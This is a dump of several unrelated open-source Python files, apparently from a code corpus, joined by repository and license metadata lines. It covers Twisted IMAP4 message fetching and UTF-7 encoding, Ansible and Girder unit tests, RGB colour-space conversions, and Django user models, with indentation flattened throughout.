this mailbox.
"""
def addMessage(message, flags = (), date = None):
"""Add the given message to this mailbox.
@type message: A file-like object
@param message: The RFC822 formatted message
@type flags: Any iterable of C{str}
@param flags: The flags to associate with this message
@type date: C{str}
@param date: If specified, the date to associate with this
message.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with the message
id if the message is added successfully and whose errback is
invoked otherwise.
@raise ReadOnlyMailbox: Raised if this Mailbox is not open for
read-write.
"""
def expunge():
"""Remove all messages flagged \\Deleted.
@rtype: C{list} or C{Deferred}
@return: The list of message sequence numbers which were deleted,
or a C{Deferred} whose callback will be invoked with such a list.
@raise ReadOnlyMailbox: Raised if this Mailbox is not open for
read-write.
"""
def fetch(messages, uid):
"""Retrieve one or more messages.
@type messages: C{MessageSet}
@param messages: The identifiers of messages to retrieve information
about
@type uid: C{bool}
@param uid: If true, the IDs specified in the query are UIDs;
otherwise they are message sequence IDs.
@rtype: Any iterable of two-tuples of message sequence numbers and
implementors of C{IMessage}.
"""
def store(messages, flags, mode, uid):
"""Set the flags of one or more messages.
@type messages: A MessageSet object with the list of messages requested
@param messages: The identifiers of the messages to set the flags of.
@type flags: sequence of C{str}
@param flags: The flags to set, unset, or add.
@type mode: -1, 0, or 1
@param mode: If mode is -1, these flags should be removed from the
specified messages. If mode is 1, these flags should be added to
the specified messages. If mode is 0, all existing flags should be
cleared and these flags should be added.
@type uid: C{bool}
@param uid: If true, the IDs specified in the query are UIDs;
otherwise they are message sequence IDs.
@rtype: C{dict} or C{Deferred}
@return: A C{dict} mapping message sequence numbers to sequences of C{str}
representing the flags set on the message after this operation has
been performed, or a C{Deferred} whose callback will be invoked with
such a C{dict}.
@raise ReadOnlyMailbox: Raised if this mailbox is not open for
read-write.
"""
class ICloseableMailbox(Interface):
"""A supplementary interface for mailboxes which require cleanup on close.
Implementing this interface is optional. If it is implemented, the protocol
code will call the close method defined whenever a mailbox is closed.
"""
def close():
"""Close this mailbox.
@return: A C{Deferred} which fires when this mailbox
has been closed, or None if the mailbox can be closed
immediately.
"""
def _formatHeaders(headers):
hdrs = [': '.join((k.title(), '\r\n'.join(v.splitlines()))) for (k, v)
in headers.iteritems()]
hdrs = '\r\n'.join(hdrs) + '\r\n'
return hdrs
def subparts(m):
i = 0
try:
while True:
yield m.getSubPart(i)
i += 1
except IndexError:
pass
def iterateInReactor(i):
"""Consume an interator at most a single iteration per reactor iteration.
If the iterator produces a Deferred, the next iteration will not occur
until the Deferred fires, otherwise the next iteration will be taken
in the next reactor iteration.
@rtype: C{Deferred}
@return: A deferred which fires (with None) when the iterator is
exhausted or whose errback is called if there is an exception.
"""
from twisted.internet import reactor
d = defer.Deferred()
def go(last):
try:
r = i.next()
except StopIteration:
d.callback(last)
except:
d.errback()
else:
if isinstance(r, defer.Deferred):
r.addCallback(go)
else:
reactor.callLater(0, go, r)
go(None)
return d
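# Editor's sketch (assumed usage; names are illustrative): drive a
# generator which mixes plain values and Deferreds, one step per
# reactor turn.
#
#     def work():
#         yield cheapStep()                  # resumed on the next reactor turn
#         yield deferToThread(blockingStep)  # resumed when the Deferred fires
#
#     d = iterateInReactor(work())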
class MessageProducer:
    CHUNK_SIZE = 2 ** 2 ** 2 ** 2  # right-associative: 2 ** 16 == 65536 bytes
def __init__(self, msg, buffer = None, scheduler = None):
"""Produce this message.
@param msg: The message I am to produce.
@type msg: L{IMessage}
@param buffer: A buffer to hold the message in. If None, I will
use a L{tempfile.TemporaryFile}.
@type buffer: file-like
"""
self.msg = msg
if buffer is None:
buffer = tempfile.TemporaryFile()
self.buffer = buffer
if scheduler is None:
scheduler = iterateInReactor
self.scheduler = scheduler
self.write = self.buffer.write
def beginProducing(self, consumer):
self.consumer = consumer
return self.scheduler(self._produce())
def _produce(self):
headers = self.msg.getHeaders(True)
boundary = None
if self.msg.isMultipart():
content = headers.get('content-type')
parts = [x.split('=', 1) for x in content.split(';')[1:]]
parts = dict([(k.lower().strip(), v) for (k, v) in parts])
boundary = parts.get('boundary')
if boundary is None:
# Bastards
boundary = '----=_%f_boundary_%f' % (time.time(), random.random())
headers['content-type'] += '; boundary="%s"' % (boundary,)
else:
if boundary.startswith('"') and boundary.endswith('"'):
boundary = boundary[1:-1]
self.write(_formatHeaders(headers))
self.write('\r\n')
if self.msg.isMultipart():
for p in subparts(self.msg):
self.write('\r\n--%s\r\n' % (boundary,))
yield MessageProducer(p, self.buffer, self.scheduler
).beginProducing(None
)
self.write('\r\n--%s--\r\n' % (boundary,))
else:
f = self.msg.getBodyFile()
while True:
b = f.read(self.CHUNK_SIZE)
if b:
self.buffer.write(b)
yield None
else:
break
if self.consumer:
self.buffer.seek(0, 0)
yield FileProducer(self.buffer
).beginProducing(self.consumer
).addCallback(lambda _: self
)
class _FetchParser:
class Envelope:
# Response should be a list of fields from the message:
# date, subject, from, sender, reply-to, to, cc, bcc, in-reply-to,
# and message-id.
#
# from, sender, reply-to, to, cc, and bcc are themselves lists of
# address information:
# personal name, source route, mailbox name, host name
#
# reply-to and sender must not be None. If not present in a message
# they should be defaulted to the value of the from field.
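        #
        # An illustrative (editor's) envelope for a one-recipient message:
        #   ['Mon, 1 Jan 2001 00:00:00 -0000', 'hello',
        #    [[None, None, 'alice', 'example.com']],   # from
        #    [[None, None, 'alice', 'example.com']],   # sender (defaulted)
        #    [[None, None, 'alice', 'example.com']],   # reply-to (defaulted)
        #    [[None, None, 'bob', 'example.com']],     # to
        #    None, None, None, '<id@example.com>']     # cc, bcc, in-reply-to, message-id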
type = 'envelope'
__str__ = lambda self: 'envelope'
class Flags:
type = 'flags'
__str__ = lambda self: 'flags'
class InternalDate:
type = 'internaldate'
__str__ = lambda self: 'internaldate'
class RFC822Header:
type = 'rfc822header'
__str__ = lambda self: 'rfc822.header'
class RFC822Text:
type = 'rfc822text'
__str__ = lambda self: 'rfc822.text'
class RFC822Size:
type = 'rfc822size'
__str__ = lambda self: 'rfc822.size'
class RFC822:
type = 'rfc822'
__str__ = lambda self: 'rfc822'
class UID:
type = 'uid'
__str__ = lambda self: 'uid'
class Body:
type = 'body'
peek = False
header = None
mime = None
text = None
part = ()
empty = False
partialBegin = None
partialLength = None
def __str__(self):
base = 'BODY'
part = ''
separator = ''
if self.part:
part = '.'.join([str(x + 1) for x in self.part])
separator = '.'
# if self.peek:
# base += '.PEEK'
if self.header:
base += '[%s%s%s]' % (part, separator, self.header,)
elif self.text:
base += '[%s%sTEXT]' % (part, separator)
elif self.mime:
base += '[%s%sMIME]' % (part, separator)
elif self.empty:
base += '[%s]' % (part,)
if self.partialBegin is not None:
base += '<%d.%d>' % (self.partialBegin, self.partialLength)
return base
class BodyStructure:
type = 'bodystructure'
__str__ = lambda self: 'bodystructure'
# These three aren't top-level, they don't need type indicators
class Header:
negate = False
fields = None
part = None
def __str__(self):
base = 'HEADER'
if self.fields:
base += '.FIELDS'
if self.negate:
base += '.NOT'
fields = []
for f in self.fields:
f = f.title()
if _needsQuote(f):
f = _quote(f)
fields.append(f)
base += ' (%s)' % ' '.join(fields)
if self.part:
base = '.'.join([str(x + 1) for x in self.part]) + '.' + base
return base
class Text:
pass
class MIME:
pass
parts = None
_simple_fetch_att = [
('envelope', Envelope),
('flags', Flags),
('internaldate', InternalDate),
('rfc822.header', RFC822Header),
('rfc822.text', RFC822Text),
('rfc822.size', RFC822Size),
('rfc822', RFC822),
('uid', UID),
('bodystructure', BodyStructure),
]
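    # Editor's note: ordering in _simple_fetch_att matters, because
    # state_fetch_att matches with startswith(); the longer 'rfc822.*'
    # names must precede the bare 'rfc822' entry or they would never match.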
def __init__(self):
self.state = ['initial']
self.result = []
self.remaining = ''
def parseString(self, s):
s = self.remaining + s
try:
while s or self.state:
# print 'Entering state_' + self.state[-1] + ' with', repr(s)
state = self.state.pop()
try:
used = getattr(self, 'state_' + state)(s)
except:
self.state.append(state)
raise
else:
# print state, 'consumed', repr(s[:used])
s = s[used:]
finally:
self.remaining = s
def state_initial(self, s):
# In the initial state, the literals "ALL", "FULL", and "FAST"
# are accepted, as is a ( indicating the beginning of a fetch_att
# token, as is the beginning of a fetch_att token.
if s == '':
return 0
l = s.lower()
if l.startswith('all'):
self.result.extend((
self.Flags(), self.InternalDate(),
self.RFC822Size(), self.Envelope()
))
return 3
if l.startswith('full'):
self.result.extend((
self.Flags(), self.InternalDate(),
self.RFC822Size(), self.Envelope(),
self.Body()
))
return 4
if l.startswith('fast'):
self.result.extend((
self.Flags(), self.InternalDate(), self.RFC822Size(),
))
return 4
if l.startswith('('):
self.state.extend(('close_paren', 'maybe_fetch_att', 'fetch_att'))
return 1
self.state.append('fetch_att')
return 0
def state_close_paren(self, s):
if s.startswith(')'):
return 1
raise Exception("Missing )")
def state_whitespace(self, s):
# Eat up all the leading whitespace
if not s or not s[0].isspace():
raise Exception("Whitespace expected, none found")
i = 0
for i in range(len(s)):
if not s[i].isspace():
break
return i
def state_maybe_fetch_att(self, s):
if not s.startswith(')'):
self.state.extend(('maybe_fetch_att', 'fetch_att', 'whitespace'))
return 0
def state_fetch_att(self, s):
# Allowed fetch_att tokens are "ENVELOPE", "FLAGS", "INTERNALDATE",
# "RFC822", "RFC822.HEADER", "RFC822.SIZE", "RFC822.TEXT", "BODY",
# "BODYSTRUCTURE", "UID",
# "BODY [".PEEK"] [<section>] ["<" <number> "." <nz_number> ">"]
l = s.lower()
for (name, cls) in self._simple_fetch_att:
if l.startswith(name):
self.result.append(cls())
return len(name)
b = self.Body()
if l.startswith('body.peek'):
b.peek = True
used = 9
elif l.startswith('body'):
used = 4
else:
raise Exception("Nothing recognized in fetch_att: %s" % (l,))
self.pending_body = b
self.state.extend(('got_body', 'maybe_partial', 'maybe_section'))
return used
def state_got_body(self, s):
self.result.append(self.pending_body)
del self.pending_body
return 0
def state_maybe_section(self, s):
if not s.startswith("["):
return 0
self.state.extend(('section', 'part_number'))
return 1
_partExpr = re.compile(r'(\d+(?:\.\d+)*)\.?')
def state_part_number(self, s):
m = self._partExpr.match(s)
if m is not None:
self.parts = [int(p) - 1 for p in m.groups()[0].split('.')]
return m.end()
else:
self.parts = []
return 0
def state_section(self, s):
# Grab "HEADER]" or "HEADER.FIELDS (Header list)]" or
# "HEADER.FIELDS.NOT (Header list)]" or "TEXT]" or "MIME]" or
# just "]".
l = s.lower()
used = 0
if l.startswith(']'):
self.pending_body.empty = True
used += 1
elif l.startswith('header]'):
h = self.pending_body.header = self.Header()
h.negate = True
h.fields = ()
used += 7
elif l.startswith('text]'):
self.pending_body.text = self.Text()
used += 5
elif l.startswith('mime]'):
self.pending_body.mime = self.MIME()
used += 5
else:
h = self.Header()
if l.startswith('header.fields.not'):
h.negate = True
used += 17
elif l.startswith('header.fields'):
used += 13
else:
raise Exception("Unhandled section contents: %r" % (l,))
self.pending_body.header = h
self.state.extend(('finish_section', 'header_list', 'whitespace'))
self.pending_body.part = tuple(self.parts)
self.parts = None
return used
def state_finish_section(self, s):
if not s.startswith(']'):
raise Exception("section must end with ]")
return 1
def state_header_list(self, s):
if not s.startswith('('):
raise Exception("Header list must begin with (")
end = s.find(')')
if end == -1:
raise Exception("Header list must end with )")
headers = s[1:end].split()
self.pending_body.header.fields = map(str.upper, headers)
return end + 1
def state_maybe_partial(self, s):
# Grab <number.number> or nothing at all
if not s.startswith('<'):
return 0
end = s.find('>')
if end == -1:
raise Exception("Found < but not >")
partial = s[1:end]
parts = partial.split('.', 1)
if len(parts) != 2:
raise Exception("Partial specification did not include two .-delimited integers")
begin, length = map(int, parts)
self.pending_body.partialBegin = begin
self.pending_body.partialLength = length
return end + 1
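# Editor's sketch (assumed usage of the state machine above):
#     p = _FetchParser()
#     p.parseString('BODY.PEEK[HEADER.FIELDS (Subject From)]<0.100>')
# p.result now holds a single Body with peek=True, a Header whose fields
# are ['SUBJECT', 'FROM'], and partialBegin=0, partialLength=100.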
class FileProducer:
    CHUNK_SIZE = 2 ** 2 ** 2 ** 2  # right-associative: 2 ** 16 == 65536 bytes
firstWrite = True
def __init__(self, f):
self.f = f
def beginProducing(self, consumer):
self.consumer = consumer
self.produce = consumer.write
d = self._onDone = defer.Deferred()
self.consumer.registerProducer(self, False)
return d
def resumeProducing(self):
b = ''
if self.firstWrite:
b = '{%d}\r\n' % self._size()
self.firstWrite = False
if not self.f:
return
b = b + self.f.read(self.CHUNK_SIZE)
if not b:
self.consumer.unregisterProducer()
self._onDone.callback(self)
self._onDone = self.f = self.consumer = None
else:
self.produce(b)
def pauseProducing(self):
pass
def stopProducing(self):
pass
def _size(self):
b = self.f.tell()
self.f.seek(0, 2)
e = self.f.tell()
self.f.seek(b, 0)
return e - b
def parseTime(s):
# XXX - This may require localization :(
months = [
'jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct',
'nov', 'dec', 'january', 'february', 'march', 'april', 'may', 'june',
'july', 'august', 'september', 'october', 'november', 'december'
]
expr = {
'day': r"(?P<day>3[0-1]|[1-2]\d|0[1-9]|[1-9]| [1-9])",
'mon': r"(?P<mon>\w+)",
'year': r"(?P<year>\d\d\d\d)"
}
m = re.match('%(day)s-%(mon)s-%(year)s' % expr, s)
if not m:
raise ValueError, "Cannot parse time string %r" % (s,)
d = m.groupdict()
try:
d['mon'] = 1 + (months.index(d['mon'].lower()) % 12)
d['year'] = int(d['year'])
d['day'] = int(d['day'])
except ValueError:
raise ValueError, "Cannot parse time string %r" % (s,)
else:
return time.struct_time(
(d['year'], d['mon'], d['day'], 0, 0, 0, -1, -1, -1)
)
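# Editor's example: parseTime('21-Apr-2001') yields a struct_time for
# April 21st, 2001 with the time-of-day fields zeroed and weekday,
# year-day and DST left unknown (-1).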
import codecs
def modified_base64(s):
s_utf7 = s.encode('utf-7')
return s_utf7[1:-1].replace('/', ',')
def modified_unbase64(s):
s_utf7 = '+' + s.replace(',', '/') + '-'
return s_utf7.decode('utf-7')
def encoder(s, errors=None):
"""
Encode the given C{unicode} string using the IMAP4 specific variation of
UTF-7.
@type s: C{unicode}
@param s: The text to encode.
@param errors: Policy for handling encoding errors. Currently ignored.
@return: C{tuple} of a C{str} giving the encoded bytes and an C{int}
giving the number of code units consumed from the input.
"""
r = []
_in = []
for c in s:
if ord(c) in (range(0x20, 0x26) + range(0x27, 0x7f)):
if _in:
r.extend(['&', modified_base64(''.join(_in)), '-'])
del _in[:]
r.append(str(c))
elif c == '&':
if _in:
r.extend(['&', modified_base64(''.join(_in)), '-'])
del _in[:]
r.append('&-')
else:
_in.append(c)
if _in:
r.extend(['&', modified_base64(''.join(_in)), '-'])
return (''.join(r), len(s))
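# Editor's example: encoder(u'Entw\xfcrfe') returns ('Entw&APw-rfe', 8);
# printable ASCII passes through while the non-ASCII character becomes a
# modified-base64 run delimited by '&' and '-'.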
def decoder(s, errors=None):
"""
Decode the given C{str} using the IMAP4 specific variation of UTF-7.
@type s: C{str}
@param s: The bytes to decode.
@param errors: Policy for handling decoding errors. Currently ignored.
@return: a C{tuple} of a C{unicode} string giving the text which was
decoded and an C{int} giving the number of bytes consumed from the
input.
"""
r = []
decode = []
for c in s:
if c == '&' and not decode:
decode.append('&')
elif c == '-' and decode:
if len(decode) == 1:
r.append('&')
else:
r.append(modified_unbase64(''.join(decode[1:])))
decode = []
elif decode:
decode.append(c)
else:
r.append(c)
if decode:
r.append(modified_unbase64(''.join(decode[1:])))
return (''.join(r), len(s))
class StreamReader(codecs.StreamReader):
def decode(self, s, errors='strict'):
return decoder(s)
class StreamWriter(codecs.StreamWriter):
def encode(self, s, errors='strict'):
return encoder(s)
_codecInfo = (encoder, decoder, StreamReader, StreamWriter)
try:
_codecInfoClass = codecs.CodecInfo
except AttributeError:
pass
else:
_codecInfo = _codecInfoClass(*_codecInfo)
def imap4_utf_7(name):
if name == 'imap4-utf-7':
return _codecInfo
codecs.register(imap4_utf_7)
__all__ = [
# Protocol classes
'IMAP4Server', 'IMAP4Client',
# Interfaces
'IMailboxListener', 'IClientAuthentication', 'IAccount', 'IMailbox',
'INamespacePresenter', 'ICloseableMailbox', 'IMailboxInfo',
'IMessage', 'IMessageCopier', 'IMessageFile', 'ISearchableMailbox',
# Exceptions
'IMAP4Exception', 'IllegalClientResponse', 'IllegalOperation',
'IllegalMailboxEncoding', 'UnhandledResponse', 'NegativeResponse',
'NoSupportedAuthentication', 'IllegalServerResponse',
'IllegalIdentifierError', 'IllegalQueryError', 'MismatchedNesting',
'MismatchedQuoting', 'MailboxException', 'MailboxCollision',
'NoSuchMailbox', 'ReadOnlyMailbox',
# Auth objects
'CramMD5ClientAuthenticator', 'PLAINAuthenticator', 'LOGINAuthenticator',
'PLAINCredentials', 'LOGINCredentials',
# Simple query interface
'Query', 'Not', 'Or',
# Miscellaneous
'MemoryAccount',
'statusRequestHelper',
]
| apache-2.0 |
quinot/ansible | test/units/modules/network/junos/test_junos_scp.py | 48 | 3579 | # (c) 2018 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests.mock import patch, MagicMock
from units.modules.utils import set_module_args
from .junos_module import TestJunosModule
jnpr_mock = MagicMock()
scp_mock = MagicMock()
modules = {
'jnpr': jnpr_mock,
'jnpr.junos': jnpr_mock.junos,
'jnpr.junos.utils': jnpr_mock.junos.utils,
'jnpr.junos.utils.scp': jnpr_mock.junos.utils.scp,
    'jnpr.junos.exception': jnpr_mock.junos.exception
}
module_patcher = patch.dict('sys.modules', modules)
module_patcher.start()
jnpr_mock.junos.utils.scp.SCP().__enter__.return_value = scp_mock
from ansible.modules.network.junos import junos_scp
class TestJunosCommandModule(TestJunosModule):
module = junos_scp
def setUp(self):
super(TestJunosCommandModule, self).setUp()
def tearDown(self):
super(TestJunosCommandModule, self).tearDown()
def test_junos_scp_src(self):
set_module_args(dict(src='test.txt'))
result = self.execute_module(changed=True)
args, kwargs = scp_mock.put.call_args
self.assertEqual(args[0], 'test.txt')
self.assertEqual(result['changed'], True)
def test_junos_scp_src_fail(self):
scp_mock.put.side_effect = OSError("[Errno 2] No such file or directory: 'text.txt'")
set_module_args(dict(src='test.txt'))
result = self.execute_module(changed=True, failed=True)
self.assertEqual(result['msg'], "[Errno 2] No such file or directory: 'text.txt'")
def test_junos_scp_remote_src(self):
set_module_args(dict(src='test.txt', remote_src=True))
result = self.execute_module(changed=True)
args, kwargs = scp_mock.get.call_args
self.assertEqual(args[0], 'test.txt')
self.assertEqual(result['changed'], True)
def test_junos_scp_all(self):
set_module_args(dict(src='test', remote_src=True, dest="tmp", recursive=True))
result = self.execute_module(changed=True)
args, kwargs = scp_mock.get.call_args
self.assertEqual(args[0], 'test')
self.assertEqual(kwargs['local_path'], 'tmp')
self.assertEqual(kwargs['recursive'], True)
self.assertEqual(result['changed'], True)
def test_junos_scp_device_param(self):
set_module_args(dict(src='test.txt',
provider={'username': 'unit', 'host': 'test', 'ssh_keyfile': 'path',
'password': 'test', 'port': 234}))
self.execute_module(changed=True)
args, kwargs = jnpr_mock.junos.Device.call_args
self.assertEqual(args[0], 'test')
self.assertEqual(kwargs['passwd'], 'test')
self.assertEqual(kwargs['ssh_private_key_file'], 'path')
self.assertEqual(kwargs['port'], 234)
self.assertEqual(kwargs['user'], 'unit')
| gpl-3.0 |
data-exp-lab/girder | tests/cases/rest_decorator_test.py | 2 | 4358 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import json
import mock
import os
import requests
from .. import base
from girder import config
from girder.api.rest import endpoint
from girder.models.user import User
def setUpModule():
os.environ['GIRDER_PORT'] = os.environ.get('GIRDER_TEST_PORT', '20200')
config.loadConfig()
testPluginPath = os.path.normpath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', '..', 'test', 'test_plugins'
))
base.mockPluginDir(testPluginPath)
base.enabledPlugins = ['test_plugin']
with mock.patch('girder.utility.plugin_utilities.logprint.exception'):
base.startServer(mock=False)
def tearDownModule():
base.stopServer()
class TestEndpointDecoratorException(base.TestCase):
"""Tests the endpoint decorator exception handling."""
def setUp(self):
with mock.patch('girder.utility.plugin_utilities.logprint.exception'):
super(TestEndpointDecoratorException, self).setUp()
@endpoint
def pointlessEndpointAscii(self, path, params):
raise Exception('You did something wrong.')
@endpoint
def pointlessEndpointUnicode(self, path, params):
raise Exception(u'\u0400 cannot be converted to ascii.')
@endpoint
def pointlessEndpointBytes(self, path, params):
raise Exception('\x80\x80 cannot be converted to unicode or ascii.')
def testEndpointExceptionAscii(self):
resp = self.pointlessEndpointAscii('', {}).decode()
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionUnicode(self):
resp = self.pointlessEndpointUnicode('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionBytes(self):
resp = self.pointlessEndpointBytes('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testBoundHandlerDecorator(self):
user = User().createUser('tester', 'password', 'Test', 'User', 'test@test.com')
resp = self.request('/collection/unbound/default/noargs', user=user, params={
'val': False
})
self.assertStatusOk(resp)
self.assertEqual(resp.json, True)
resp = self.request('/collection/unbound/default', user=user, params={
'val': False
})
self.assertStatusOk(resp)
self.assertEqual(resp.json, True)
resp = self.request('/collection/unbound/explicit', user=user)
self.assertStatusOk(resp)
self.assertEqual(resp.json, {
'name': 'collection',
'userLogin': 'tester'
})
def testRawResponse(self):
resp = self.request('/other/rawWithDecorator', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is a raw response')
resp = self.request('/other/rawInternal', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is also a raw response')
# We must make an actual request in order to test response encoding
# at the WSGI server layer.
resp = requests.get(
'http://127.0.0.1:%s/api/v1/other/rawReturningText' % os.environ['GIRDER_TEST_PORT'])
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.headers['Content-Type'], 'text/plain;charset=utf-8')
self.assertEqual(resp.content, b'this is not encoded \xf0\x9f\x91\x8d')
self.assertEqual(resp.text, u'this is not encoded \U0001F44D')
| apache-2.0 |
40223136/2015cdag1man | static/Brython3.1.3-20150514-095342/Lib/colorsys.py | 1066 | 3691 | """Conversion functions between RGB and other color systems.
This modules provides two functions for each color system ABC:
rgb_to_abc(r, g, b) --> a, b, c
abc_to_rgb(a, b, c) --> r, g, b
All inputs and outputs are triples of floats in the range [0.0...1.0]
(with the exception of I and Q, which cover a slightly larger range).
Inputs outside the valid range may cause exceptions or invalid outputs.
Supported color systems:
RGB: Red, Green, Blue components
YIQ: Luminance, Chrominance (used by composite video signals)
HLS: Hue, Luminance, Saturation
HSV: Hue, Saturation, Value
"""
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.60*r - 0.28*g - 0.32*b
q = 0.21*r - 0.52*g + 0.31*b
return (y, i, q)
def yiq_to_rgb(y, i, q):
r = y + 0.948262*i + 0.624013*q
g = y - 0.276066*i - 0.639810*q
b = y - 1.105450*i + 1.729860*q
if r < 0.0:
r = 0.0
if g < 0.0:
g = 0.0
if b < 0.0:
b = 0.0
if r > 1.0:
r = 1.0
if g > 1.0:
g = 1.0
if b > 1.0:
b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
s = (maxc-minc) / (maxc+minc)
else:
s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0:
return l, l, l
if l <= 0.5:
m2 = l * (1.0+s)
else:
m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH:
return m1 + (m2-m1)*hue*6.0
if hue < 0.5:
return m2
if hue < TWO_THIRD:
return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc:
return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
i = i%6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
# Cannot get here
| gpl-3.0 |
AlexeyBerezhnoy/lucas | account/models.py | 2 | 4943 | from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser, PermissionsMixin, Permission
from account.validator import validate_name, validate_profession, validate_experience
CATEGORIES = ['A', 'A1', 'B', 'B1', 'BE', 'C', 'C1', 'CE', 'C1E', 'D', 'D1', 'DE', 'D1E', 'M', 'Tm', 'Tb']
class ModeratorManager(BaseUserManager):
def create_moderator(self, email, last_name, first_name, middle_name, password):
user = self.model(email=self.normalize_email(email),
last_name=last_name,
first_name=first_name,
middle_name=middle_name)
user.is_admin = True
user.save()
user.user_permissions.add(Permission.objects.get(codename='manipulate_expert'))
user.set_password(password)
user.save()
return user
def get_queryset(self):
        return super(ModeratorManager, self).get_queryset().filter(is_admin=True)
class ExpertManager(BaseUserManager):
def create_expert(self, email, last_name, first_name, middle_name,
profession, professional_experience, position,
driver_license, driving_experience):
user = self.model(email=email, last_name=last_name, first_name=first_name, middle_name=middle_name,
profession=profession, professional_experience=professional_experience, position=position,
driver_license=driver_license, driving_experience=driving_experience)
user.save()
return user
def get_queryset(self):
        return super(ExpertManager, self).get_queryset().filter(is_expert=True)
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField("email",
unique=True)
last_name = models.CharField("фамилия",
max_length=30,
validators=[validate_name])
first_name = models.CharField("имя",
max_length=30,
validators=[validate_name])
middle_name = models.CharField("отчество",
max_length=30,
validators=[validate_name])
profession = models.CharField("профессия",
max_length=30,
blank=True,
validators=[validate_profession])
position = models.CharField("должность",
max_length=30,
blank=True,
validators=[validate_profession])
professional_experience = models.PositiveSmallIntegerField("опыт работы",
null=True,
validators=[validate_experience])
driver_license = models.CharField("Водительское удостоверение",
max_length=30,
blank=True,
choices=((cat, cat) for cat in CATEGORIES))
driving_experience = models.IntegerField("Водительский стаж",
null=True,
validators=[validate_experience])
is_expert = models.BooleanField(default=False)
is_active = models.BooleanField(default=False)
is_admin = models.BooleanField(default=False)
USERNAME_FIELD = 'email'
objects = BaseUserManager()
def __str__(self):
return self.email
    # TODO: it would be better to use the standard permission checks
def has_perm(self, perm, obj=None):
p = Permission.objects.get(codename=perm)
if p not in self.user_permissions.all():
return False
return True
def has_perms(self, perm_list, obj=None):
for perm in perm_list:
if not self.has_perm(perm):
return False
return True
class Moderator(User):
objects = ModeratorManager()
class Meta:
proxy = True
def __str__(self):
return self.email
class Expert(User):
objects = ExpertManager()
def save(self, *args, **kwargs):
"""
Запрещает сохранять экспертом поле
водительский стаж без наличия прав
"""
if not self.driver_license:
            self.driving_experience = None  # IntegerField(null=True): clear with None, not False
self.is_expert = True
super(Expert, self).save(*args, **kwargs)
class Meta:
proxy = True
permissions = (
('manipulate_expert', 'Can create, edit, view and remove expert'),
)
| mit |
clusto/clusto | src/clusto/commands/tree.py | 5 | 4580 | #!/usr/bin/env python
"""Display clusto objects, recursively, with attributes, and/or in color."""
import sys
